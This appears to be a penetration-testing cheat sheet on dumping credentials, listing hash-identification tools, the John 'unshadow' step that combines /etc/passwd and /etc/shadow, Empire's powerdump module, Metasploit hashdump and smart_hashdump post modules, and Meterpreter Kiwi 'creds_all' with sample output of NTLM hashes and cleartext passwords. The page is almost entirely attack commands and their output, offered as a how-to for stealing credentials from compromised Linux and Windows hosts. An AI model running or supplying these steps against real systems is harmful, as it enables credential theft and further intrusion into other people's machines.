Get Hashes


> hashid 123XYZ...
> hash-identifier

unshadow (john)

unshadow /etc/passwd /etc/shadow combined.txt

Empire on Windows

(Empire: powershell/credentials/powerdump) > run
[*] Tasked DHX9MABL to run TASK_CMD_JOB
[*] Agent DHX9MABL tasked with task ID 1
[*] Tasked agent agentHIGH to run module powershell/credentials/powerdump
(Empire: powershell/credentials/powerdump) > [*] Agent DHX9MABL returned results.


Metasploit - hashdump

smart_hashdump  ..sometimes isnt so smart
hashdump        ..try both!!!!!

meterpreter > run post/windows/gather/smart_hashdump
meterpreter > run post/windows/gather/hashdump

Meterpreter Kiwi

meterpreter > load kiwi
meterpreter > creds_all

[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials

Username       Domain   NTLM                              SHA1
--------       ------   ----                              ----
Administrator  TARGET   abxlkaselkbjlcije89893289823sers  lkjawleijviw989w8evw98va9898wer9w8e42893
KALI$          TARGET   kleilvkejlaijlsijej3902930923409  0902349824lkajslkjvliaejlwejoifjwf092039

wdigest credentials

Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  TARGET   secretPW
KALI$          TARGET   youFOUNDmypaxxwurd

kerberos credentials

Username       Domain        Password
--------       ------        --------
(null)         (null)        (null)
Administrator  TARGET        (null)
KALI$          target.local  youFOUNDmypaxxwurd
kali   $       target.LOCAL  (null)

Last updated